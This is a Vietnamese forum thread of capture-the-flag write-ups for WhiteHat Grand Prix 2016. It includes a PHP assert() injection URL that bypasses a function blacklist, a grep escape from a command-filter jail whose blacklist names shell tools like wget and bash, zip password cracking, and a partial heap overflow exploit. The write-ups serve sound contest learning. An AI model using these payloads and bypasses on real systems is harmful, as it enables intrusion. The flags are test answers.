[Writeup] WhiteHat Grand Prix 2016

Thảo luận trong 'Writeup WhiteHat Grand Prix' bắt đầu bởi whf, 27/12/16, 11:12 PM.

  1. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Topic này được tạo để các bạn chia sẻ, trao đổi, thảo luận về Writeup các bài thi tại WhiteHat Grand Prix 2016. Các bạn cùng tham gia nhé!

    Các bài thi gồm có:




























































































































































































































































    STT Tên món ăn Writeup1 Tên đội Writeup2 Tên đội
    1 Bánh bèo bì Bình Dương
    2 Bánh bột chiên
    3 Bánh bột lọc Writeup[/URL] rawsec
    4 Bánh căn Ninh Thuận Writeup[/URL] p4 Writeup[/URL] CLGTftMeePwn
    5 Bánh canh Trảng Bàng – Tây Ninh Writeup[/URL] CLGTftMeePwn
    6 Bánh Chưng Writeup[/URL] CLGTftMeePwn
    7 Bánh cóng Sóc Trăng Writeup[/URL] CLGTftMeePwn
    8 Bánh cuốn Thanh Trì Writeup[/URL] qt Writeup[/URL] ISITDTU
    9 Bánh đa kế Bắc Giang Writeup[/URL] rawsec
    10 Bánh Giày Writeup[/URL] rawsec Writeup[/URL] ISITDTU
    11 Bánh ít lá gai Quy Nhơn Writeup[/URL] rawsec
    12 Bánh khọt Bà Rịa – Vũng Tàu
    13 Bánh mì Writeup[/URL] ISITDTU
    14 Bánh phu thê Đình Bảng
    15 Bánh răng bừa Hưng Yên
    16 Bánh tằm bì Bạc Liêu
    17 Bánh tráng cuốn thịt heo Đà Nẵng Writeup[/URL] qt
    18 Bánh xèo Writeup[/URL] ISITDTU
    19 Bún bò Huế
    20 Bún bò Nam Bộ Writeup[/URL] 217
    21 Bún chả Hà Nội Writeup[/URL] ISITDTU
    22 Cao lầu Writeup[/URL] 217
    23 Cao lầu Hội An
    24 Chả cá lã vọng
    25 Cháo lươn Nghệ An
    26 Cơm gà Hội An Writeup[/URL] DauGau
    27 Cơm hến Thừa Thiên Huế Writeup[/URL] LS
    28 Cơm tấm Sài Gòn
    29 Gỏi cuốn
    30 Lẩu mắm U Minh
    31 Mì Quảng Writeup[/URL] ISITDTU
    32 Nem rán Writeup[/URL] DauGau
    33 Phở Hà Nội
    34 Phở khô Gia Lai
    35 Xôi ngũ sắc Tây Bắc
     
    Last edited by a moderator: 21/01/17, 02:01 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Banh bot loc

    Category Web Security | Teams having solved this 108 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

    Description:


    Solution:

    Here is the home page:
    [​IMG]



    The login link go to http://web05.grandprix.whitehatvn.co...password=guest and says noob.
    [​IMG]




    Let’s see source code of teh web page:

    Mã:
        hello
        
        [URL="index.php?username=guest&password=guest"]login[/URL]
        Login to get our secret
    
    
    Ok, let’s see index.php.bak:

    Mã:
    
    
    Ok so the login checks that the concatenation of the username and the key is equal to the md5 hash of the password.

    So we need to find a hash like ????????????????????????????1337 (28 random hex chars and 1337).

    I first thought to download a md5 hash dictionary but I didn’t wanted to wait during teh download.

    So I went to md5db.net and looked for a hash beginning with 0000, did a CTRL + F to find 1337 and finaly found one: # 13381 Hash 0000dd456d15560290351cb4e6311337 Word hdtfz.

    So we get:
    • username: 0000dd456d15560290351cb4e631
    • key: 1337
    • password: hdtfz
    I submited the url: http://web05.grandprix.whitehatvn.co...password=hdtfz and got the flag

    Mã:
    WhiteHat{92ab818618fee438a1ea3944b5940237975f2b1d}
    [​IMG]



    1.png

    2.png

    3.png
     
    Last edited by a moderator: 27/12/16, 11:12 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Banh da Ke


    Category Miscellaneous | Teams having solved this 50 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

    Description:


    create_folder_player.py

    Mã:
    import os
    import random
    flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
    count = 0
    length = len(flag)
    print length
    arr = random.sample(range(0,10000),length)
    arr = sorted(arr)
    for k in range(0,10000):
        try:
            os.mkdir(str(k))
        except:
            pass
        if k in arr:
            f=open("./"+str(k)+"/"+os.urandom(8).encode("hex")+"."+os.urandom(8).encode("hex"),"w").write(str(flag[count]))
            count +=1
    mics.py

    Mã:
    #!/usr/bin/env python
    import os
    import re
    import sys
    blaclist = "cat|nano|less|tail|vim|head|apt|install|wget|more|emacs|vi|subl|pico|bash|sh|rm|sed|nl|flag.hihi|`|%|\$|chmod|python"
    myregrex = "\W*(?i)("+blaclist+")\W*"
    cmd = ""
    while(cmd != "exit"):
        sys.stdout.write("Input your command: \n")
        sys.stdout.flush()
        cmd = raw_input()
        check = re.findall(myregrex,cmd)
        if check!=[]:
            sys.stdout.write("rejected\n")
            sys.stdout.flush()
            continue
        try:
            #call()
            a ="XXXXXXXXXXXXX"
            a+=cmd
            os.system(a)
        except:
            sys.stdout.write("bad command\n")
            sys.stdout.flush()
    Solution:

    create_folder_player.py: there will be 10000 folders with one part of the flag in several of them choosen randomly.
    • misc.py: lol, the spell. blaclist vs blacklist.
    • misc.py: ok seriously, blacklist usage sucks so I wont do a script to send a ls for the all 10000 folders. I will simply find a command not blacklisted: grep.
    • grep is magic, you can use all kind of regex and use it recursively:
    Mã:
    Input your command:
    grep -r -E '*.*' .
    ./5256/7e8e1adc2c27d5ae.b20d7fe2eeee83a6:e
    ./5363/049185c04d8d4a6a.14b749db725281b6:p
    ./9149/e60247d6e9b86d66.538088287218f418:h
    ./6625/99c4b89e33717d68.4e7cfddc3ab792ab:m
    ./2961/af1fa87c94746adc.4ceba2ad4425295a:H
    ./5360/3b1d1d39b7cdfc5e.b3d700c19f7da568:3
    ./7520/be92bc1c03188333.8a0acf56d05e21f2:D
    ./9460/0990eb1ff5a0f0f4.2b8448627eda707d:4
    ./7261/85c5e9b11412182b.c8aa64a3e89d6116:4
    ./4464/bfb49af4d0d18330.0e0a92989ea0cd16:{
    ./8447/1383404de7cf99d1.801ee7e580554bf7:r
    ./9817/abb9dad1b91251c0.8aca51ae85b0a5a3:}
    ./2464/91001f84e6b7043c.362d39207f7113d5:e
    ./6089/0da7f2cf81b578bc.64aceb97e90d59b8:4
    ./7265/0d1d93183a71652c.f62fd332e6a893c7:n
    ./8042/45b7f42e37a7036d.4649801c191cd850:t
    ./8566/eb0eac89c6af6941.a01ee5abd0018d64:y
    ./1490/ce66a0652ef071e2.8e59cb623f5044db:i
    ./3391/d5bb02174118cd0a.8452e896dc972780:a
    ./9729/ff958bf095684403.ba220df0c0a00cbc:d
    ./5627/39835fcae4e0fb1e.d63a2b4f7cd6cc4d:_
    ./5754/01b98e405d1a6f5e.dfea13f68bf1d28c:c
    ./2124/0388bdb00dff778b.cf361e5e8cba7330:t
    ./8919/8b998e1b2d84792e.05c56576bc8a640c:_
    ./251/01fbe27318a591b2.32905c5f1c5d5be2:W
    ./6805/421c3e7b161f09e6.cb2d792b88d852d3:_
    ./7615/40672c2915963dc7.23d290b7ab5a23fe:_
    ./4983/29a3e67904c136c1.82698942425d3172:k
    ./4091/5d4d11679777c463.54a739cf22f2147f:t
    ./1477/76ed9a66da76f47c.fffc5ebba341f304:h
    ./6428/4ab16af8f7bea2ca.f326ac02efddd099:l
    ./9664/3a309f1c601603e8.949523481193df68:r
    
    • Save the output in a text file.
    • Let’s order that with a ruby script:
    Mã:
    #!/usr/bin/ruby
    arr = []
    File.open('misc04.txt').each do |line|
        # math the folderName, fileName and content of each file (one char)
        regex = line.match(/\/([0-9]{1,4})\/([a-f0-9]{16}\.[a-f0-9]{16}):(.)/)
        folderName = regex.captures[0]
        fileName = regex.captures[1]
        char = regex.captures[2]
        # convert folderName to int in order to be able to sort it the right way. Sort as int (2464 > 251), sort a string (2464 < 251).
        arr.push([folderName.to_i,fileName,char])
    end
    # sort by first col, so sort by fileName
    arr.sort!
    # display only chars (third column of each row)
    arr.each{|r| print r[2]}
    • Execute it:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ ruby sorted.rb
    WhiteHat{ke3p_c4lm_4nD_try_h4rd}
    • Format the flag (WhiteHat{SHA1(flag)}):
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ printf %s 'WhiteHat{ke3p_c4lm_4nD_try_h4rd}' | sha1sum
    1a05093adb0795d8e2f5b89985c43b85bcb11d19  -
    • Submit the flag: WhiteHat{1a05093adb0795d8e2f5b89985c43b85bcb11d19}.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    [h=4]Banh can[/h] Category Web Security | Teams having solved this 29 | Point 100 | Author: WhiteHat Wargame| Writeup: p4

    Description:


    Solution:

    In the task we get a webpage with a form. We can input some data in the form and submit it, which causes redirection to:

    Mã:
    http://web04.grandprix.whitehatvn.com/index.php?hello=our_input
    And it prints out Hello our_input.

    There is also a hint in the source code that we can try calling function hint.

    After a while we figure out that the parameter name is the function name and the value is string argument. This means we can go to:

    Mã:
    http://web04.grandprix.whitehatvn.com/index.php?hint
    To call hint function. This functions shows us that there is a blacklist for some inputs:

    Mã:
    $blacklist = array("system", "passthru", "exec", "read", "open", "eval", "backtick", "", "_");`
    We quickly notice that there is one function missing here, which enables us to call any PHP code from a string parameter -assert.

    So we can call:

    Mã:
    http://web04.grandprix.whitehatvn.com/index.php?assert=phpinfo()
    And it shows us phpinfo, with list of all disabled PHP functions. It seems there is no way of getting a shell, but maybe we don't need it. We decide to read index.php just to see what exactly we're dealing with.

    While _ is blacklisted, we can just concatenate string with chr(95) instead so we call:

    Mã:
    http://web04.grandprix.whitehatvn.com/index.php?assert=assert(%27print(file%27.chr(95).%27get%27.chr(95).%27contents(%22index.php%22))%27)
    in order to call assert('file_get_contents("index.php")')

    and the flag is in the source code:

    Mã:
    WhiteHat{36b32e1f18a0da66de3b9dd29db947155b35320f}
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Nem ran

    Category Reverse Engineering | Teams having solved this 35 | Point 100 | Author: WhiteHat Wargame | Writeup: DauGau

    Description:

    Solution:
    [video=youtube;ssMRYIPUzNM]https://www.youtube.com/watch?v=ssMRYIPUzNM[/video]​
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. sunny

    sunny Điều hành viên Thành viên BQT

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,882
    Đã được thích: 855
    Điểm thành tích:
    113
    Cảm ơn Mod whf đã tổng hợp, các đội có thể gửi luôn writeup vào đây.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 309
    Đã được thích: 238
    Điểm thành tích:
    43
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Cảm ơn bài writeup của mod Sugi_b3o! Đối với những bài đã có writeup nhưng anh em có cách giải khác thì cứ mạnh dạn chia sẻ nhé.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Cao lau

    Category: Pwnable | Teams having solved this: 1 | Point: 400 | Author: WhiteHat Wargame | Writeup: 217

    Description:

    Solution:

    Basic Info

    Attachments are two 32bit ELFs and one plaintext: note_trial_1, ptrace_32, blacklist.txt
    [​IMG]



    The note_trial_1 binary is Full RELRO but no PIE enable. While it do have canary, the checksec of pwntools might have bugs.

    The ptrace_32 binary is a sandbox, which use ptrace to forbid its child(i.e note_trial_1) from using syscalls listed inblacklist.txt.

    We will see the forbidden syscalls later, let's focus on functions of note_trial_1 first.

    Functions

    (Only important functions are listed)
    • Initialize notes:
    Mã:
    /*
    struct Note {
      char name[32];
      char date[32];
      char body[300];
    }; */
    for(i = 0; i name, 32)
    [*]readline(note->date, 32)
    [*]readline(note->body, 300)
    [/LIST]
    [*]read:
    [LIST]
    [*]Input index
    [*]Show contents of pool[index].
    [/LIST]
    [*]teencode:
    [LIST]
    [*]Input index
    [*]note = pool[index];
    [*]convert content of note->body to leetcode(e.g. A->4, C->[, M->|V|).
    [/LIST]
    [*]license:
    [LIST]
    [*]return if cafe != 0xcafebabe
    [*]If input the correct five number license, will have [B]format string vulnerability[/B].
    [*]cafe = 0xc4f3b4b3
    [/LIST]
    [/LIST][B]Vulnerability[/B]
    
    One vulnerability has been described above: if input the correct license then we can use the [URL="https://www.owasp.org/index.php/Format_string_attack"]fmt string attack[/URL].
    
    However, we don't know what the correct license is - if we don't know the random seed.
    
    Another vulnerability is the command teencode, which converts M to |V|, K to |
     

    Các file đính kèm:

    Last edited by a moderator: 28/12/16, 06:12 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    Bun bo Nam Bo

    Category: Pwnable | Teams having solved this: 2 | Point: 500 | Author: WhiteHat Wargame | Writeup: 217

    Description:


    Solution:

    Basic Info

    Attachments are two 32bit ELF note, note_client and glibc libc-2.19
    [​IMG]



    Normal protection, no PIE and Partial RELRO.

    Directly run binary note will face a punch of hex:
    [​IMG]



    While it looks like as normal menu challenge in IDA:
    [​IMG]



    Why there's hex code when running?

    After analysis, all I/O in note has been encrypt/decrypt in some way:
    [​IMG]


    Let's skip here, and see what does note_client do first:

    Directly run will get:
    [​IMG]


    With IDA we found it want to read a file named config.txt, and connect the host:port described in config.txt.

    So we create config.txt with content 127.0.0.1 31337, and use ncat to create a socket service of note listen at 127.0.0.1:31337, then note_client:
    [​IMG]


    It works!

    Actually note_client just do the I/O encrypt/decrypt to communicate with note. So we can skip the enc/dec algorithm in note now and just use note_client to interact with note.

    Info of note
    • Initialize: pool = (Pool*)malloc(0x1000), with structure:
    Mã:
    struct Pool
    {
      int limit;
      int alive_amount
      Note note[255];
    };
    struct Note
    {
      int inuse;
      int sz;
      char *content;
    };
    Don't care limit, alive_amount, they are used for limit the amount of note not exceed 255.

    Commands:
    • list: print the content of notes with inuse is true
    • read:
      1. check index is valid
      2. check note[index]->inuse is true
      3. show its date/name/body
    • add: create a new note, steps show as follows:
      1. loop pool to find the first note with inuse is false
      2. Input a size, 32 content, 31)
      3. Input date:readn(note->content+32, 15)
      4. Input body: readn(note->content+48, size)
      5. note->inuse = true
      6. note->sz = size
    • free: specific a index
      1. check index is valid
      2. check note[index]->inuse is true
      3. free(note[index]->content)
      4. note->inuse = false
    • edit: specific a index
      1. check index is valid
      2. check note[index]->inuse is true
      3. Input name:readn(note->content, 31)
      4. Input date:readn(note->content+32, 15)
      5. Input body: readn(note->content+48, note->sz)
    Vulnerability

    There're many incorrect bounding check in note, but all of them are few dangers. The only crackable vulnerability is there's a buffer overflow in input function. The implementation of input looks like this: (not exactly because there's decrypt algo. in origin, follows is a simplified version):

    Mã:
    void readn(char *output, int len) {
      int i=0, c;
      while((c = getchar()) != '\n') {
        output[i++] = c;
        if(i >= len) break;
      }
      output[i] = c;
    }
    If the input length is exactly len and the last character is not line break, then will cause one null-byte overflow.

    Exploit

    Remain is our favorite heap exploit.


    Information Leak

    Since we can only overflow one null-byte, we must overflow the size of next heap chunk. First use the command add to construct our heap layout:

    After add(36); add(36); add(316); add(36); add(36), heap will look like this:

    Mã:
    +---------------+---------+---------+------------------+---------+---------+-----------+
    | pool: 0x1009  | 0: 0x59 | 1: 0x59 |     2: 0x171     | 3: 0x59 | 4: 0x59 | top_chunk |
    +---------------+---------+---------+------------------+---------+---------+-----------+
    
    
    Then free the first note(free(0)), and trigger overflow when editing the second note(edit(1)):

    Mã:
               |------- 0xb0 ------|
    +----------+---------+---------+----------------+-+---------+---------+-----------+
    |  0x1009  | 0: 0x59 | 1: 0x58 | 2: 0x100(fake) | | 3: 0x59 | 4: 0x59 | top_chunk |
    +----------+---------+---------+----------------+-+---------+---------+-----------+
               |  freed  |         | prev_size(0xb0)| |
               +---------+         +----------------+-+
    
    Since the chunk size of note 2 has been changed to 0x100, which implys its prev_inuse bit is zero, now free it(free(2)) will trigger the chunk merge between note 0 and note 2:

    Mã:
    +----------+---------+---------+-----------+------+---------+---------+-----------+
    |  0x1009  |            0x1b1              | 0x70 | 3: 0x59 | 4: 0x59 | top_chunk |
    +----------+---------+---------+-----------+------+---------+---------+-----------+
                         | 1: 0x58 |
     

    Các file đính kèm:

    • 1.jpg
      1.jpg
      Kích thước:
      34.9 KB
      Đọc:
      161
    • 2.jpg
      2.jpg
      Kích thước:
      56.5 KB
      Đọc:
      154
    • 3.jpg
      3.jpg
      Kích thước:
      22.5 KB
      Đọc:
      158
    • 4.jpg
      4.jpg
      Kích thước:
      26 KB
      Đọc:
      167
    • 5.png
      5.png
      Kích thước:
      21.9 KB
      Đọc:
      157
    • 6.jpg
      6.jpg
      Kích thước:
      40.8 KB
      Đọc:
      157
    • 7.jpg
      7.jpg
      Kích thước:
      78.8 KB
      Đọc:
      160
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,066
    Đã được thích: 710
    Điểm thành tích:
    113
    [h=4]Banh Giay[/h] Category Forensics | Teams having solved this 14 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

    Description:


    Solution:
    • Download the zip.
    • Extract it.
    • Open the pcapng with Wireshark.
    • Filter http requests.
    • See frame n°134 GET /corporation/secret HTTP/1.1.
    • Extract the file (File > Export Objects > HTTP).
    • Check the type of file:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ file secret
    secret: Zip archive data, at least v2.0 to extract
    • Unzip it:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ unzip secret
    Archive:  secret
    [secret] EasyExtrack password:
    • Ok, there is a pasword, let’s check the html page: frame n°149 GET /corporation/arsenal.html HTTP/1.1.
    • Extract it from the pcapng.
    • See the hint: For H.i.n.t: Referring to arsenal, i remember a number. It also length of secret p.a.s.s.w.o.r.d.
    • One key event is:
    • With luck and guessing I found this number was 4.
    • So now let’s try to crack the zip password with fcrackzip:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ fcrackzip -b -c a -l 4 -u secret
    PASSWORD FOUND!!!!: pw == fuzu
    • Extract the zip with the password.
    • Check what file type EasyExtrack is:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ file EasyExtrack
    EasyExtrack: Zip archive data, at least v1.0 to extract
    • Try to unzip it with the same password:
    Mã:
    [[email protected]]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
    $ unzip EasyExtrack -d out
    Archive:  EasyExtrack
       creating: out/EasyExtrack/
    [EasyExtrack] EasyExtrack/flag1.txt password:
      inflating: out/EasyExtrack/flag1.txt  
      inflating: out/EasyExtrack/flag10.txt  
      inflating: out/EasyExtrack/flag11.txt  
      inflating: out/EasyExtrack/flag12.txt  
      inflating: out/EasyExtrack/flag13.txt  
      inflating: out/EasyExtrack/flag14.txt  
      inflating: out/EasyExtrack/flag15.txt  
      inflating: out/EasyExtrack/flag16.txt  
      inflating: out/EasyExtrack/flag17.txt  
      inflating: out/EasyExtrack/flag18.txt  
      inflating: out/EasyExtrack/flag19.txt  
      inflating: out/EasyExtrack/flag2.txt  
      inflating: out/EasyExtrack/flag20.txt  
      inflating: out/EasyExtrack/flag21.txt  
      inflating: out/EasyExtrack/flag22.txt  
      inflating: out/EasyExtrack/flag23.txt  
      inflating: out/EasyExtrack/flag24.txt  
      inflating: out/EasyExtrack/flag25.txt  
      inflating: out/EasyExtrack/flag26.txt  
      inflating: out/EasyExtrack/flag27.txt  
      inflating: out/EasyExtrack/flag28.txt  
      inflating: out/EasyExtrack/flag29.txt  
      inflating: out/EasyExtrack/flag3.txt  
      inflating: out/EasyExtrack/flag30.txt  
      inflating: out/EasyExtrack/flag4.txt  
      inflating: out/EasyExtrack/flag5.txt  
      inflating: out/EasyExtrack/flag6.txt  
      inflating: out/EasyExtrack/flag7.txt  
      inflating: out/EasyExtrack/flag8.txt  
      inflating: out/EasyExtrack/flag9.txt
    • Here are all the flags:
    Mã:
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{12f54a96f6444324693t0da001cafda8b}
    raw: Flag{60b725f10c9c85c70d9h7880dfe8191b3}
    raw: Flag{f5302386464f953ed58u1edac03556e55}
    raw: Flag{d9bed3b7e151f11b8fdyadf75f1db96d9}
    raw: Flag{3b5d5c3712955042212n316173ccf37be}
    raw: Flag{72cfd272ace172fa3502h6445fbef9b03}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{9a8ad92c50cae39aa2c5604pfd0ab6d8c}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
    raw: Flag{12f54a96f64443s246930da001cafda8b}
    raw: Flag{92520a5a9cf8932i20b9cd447f585f144}
    raw: Flag{01fbdc44ef819db6p273bc30965a23814}
    raw: Flag{9ffbf43126e33be52hcd2bf7e01d627f9}
    raw: Flag{12f54a96f644432469o30da001cafda8b}
    raw: Flag{9d7bf075372908f55e2nd945c39e0a613}
    raw: Flag{92520a5a9cf893220b9cud447f585f144}
    raw: Flag{009520053b00386d1173fu3988c55d192}
    raw: Flag{e73af36376314c7c0022cbk1d204f76b3}
    raw: Flag{e85dde330c34efb0e526ee3j082e4353b}
    raw: Flag{7d9d25f71cb8a5aba8620254l0a20d405}
    
    • Flags are not hashes because they are 33 char long. But we can see there is one non-hex char in each flag.
    • Remove each non-hex flag to get 32 char long MD5 hashed:
    Mã:
    d2a33790e5bf28b33cdbf61722a06989
    12f54a96f64443246930da001cafda8b
    60b725f10c9c85c70d97880dfe8191b3
    f5302386464f953ed581edac03556e55
    d9bed3b7e151f11b8fdadf75f1db96d9
    3b5d5c3712955042212316173ccf37be
    72cfd272ace172fa35026445fbef9b03
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    9a8ad92c50cae39aa2c5604fd0ab6d8c
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    d2a33790e5bf28b33cdbf61722a06989
    12f54a96f64443246930da001cafda8b
    92520a5a9cf893220b9cd447f585f144
    01fbdc44ef819db6273bc30965a23814
    9ffbf43126e33be52cd2bf7e01d627f9
    12f54a96f64443246930da001cafda8b
    9d7bf075372908f55e2d945c39e0a613
    92520a5a9cf893220b9cd447f585f144
    009520053b00386d1173f3988c55d192
    e73af36376314c7c0022cb1d204f76b3
    e85dde330c34efb0e526ee3082e4353b
    7d9d25f71cb8a5aba86202540a20d405
    
    • The extracted wrong letters are (in order): xthuynhxxxpxxxxxxxxsiphonuukjl.
    • Use hashkiller.co.uk to decrypt MD5 hashes:
    Mã:
      
        d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    12f54a96f64443246930da001cafda8b MD5 : l
    60b725f10c9c85c70d97880dfe8191b3 MD5 : a
    f5302386464f953ed581edac03556e55 MD5 : g
    d9bed3b7e151f11b8fdadf75f1db96d9 MD5 : {
    3b5d5c3712955042212316173ccf37be MD5 : b
    72cfd272ace172fa35026445fbef9b03 MD5 : r
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    9a8ad92c50cae39aa2c5604fd0ab6d8c MD5 : f
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
    12f54a96f64443246930da001cafda8b MD5 : l
    92520a5a9cf893220b9cd447f585f144 MD5 : _
    01fbdc44ef819db6273bc30965a23814 MD5 : h
    9ffbf43126e33be52cd2bf7e01d627f9 MD5 : e
    12f54a96f64443246930da001cafda8b MD5 : l
    9d7bf075372908f55e2d945c39e0a613 MD5 : p
    92520a5a9cf893220b9cd447f585f144 MD5 : _
    009520053b00386d1173f3988c55d192 MD5 : y
    e73af36376314c7c0022cb1d204f76b3 MD5 : o
    e85dde330c34efb0e526ee3082e4353b MD5 : u
    7d9d25f71cb8a5aba86202540a20d405 MD5 : }
    • Unformated flag is: Flag{brFFFfFFFFFFFFl_help_you}.
    • SHA1 the unformated flag:
    Mã:
    [[email protected]]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
    $ printf %s 'Flag{brFFFfFFFFFFFFl_help_you}' | sha1sum
    e7643ccd180c84176ae0b4361c3b169fceacf961  -
    • Format the flag: WhiteHat{e7643ccd180c84176ae0b4361c3b169fceacf961}.
    • Not the good flag …
    Note that 800618943025315f869e4e1f09471012 is the right md5 hash for F andd2a33790e5bf28b33cdbf61722a06989 is the wrong md5 hash for F that you can obtain with non POSIX tools like echo (that’s why I use printf). So only hashkiller knows both wrong and right hash, all other md5 decrypt online tools knows only the right one so they are not able to decrypt d2a33790e5bf28b33cdbf61722a06989. But anyway…
    • You know what? After some wasted hours I figured that I needed to replace F with some guessed letters:Flag{bruteforce_will_help_you}. Yes guessing again.
    • SHA1 the unformated flag:
    Mã:
    [[email protected]]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
    $ printf %s 'Flag{bruteforce_will_help_you}' | sha1sum
    1e71b26aa01733cd13e5199386c70fe31df43deb  -
    • Format the flag: WhiteHat{1e71b26aa01733cd13e5199386c70fe31df43deb}.
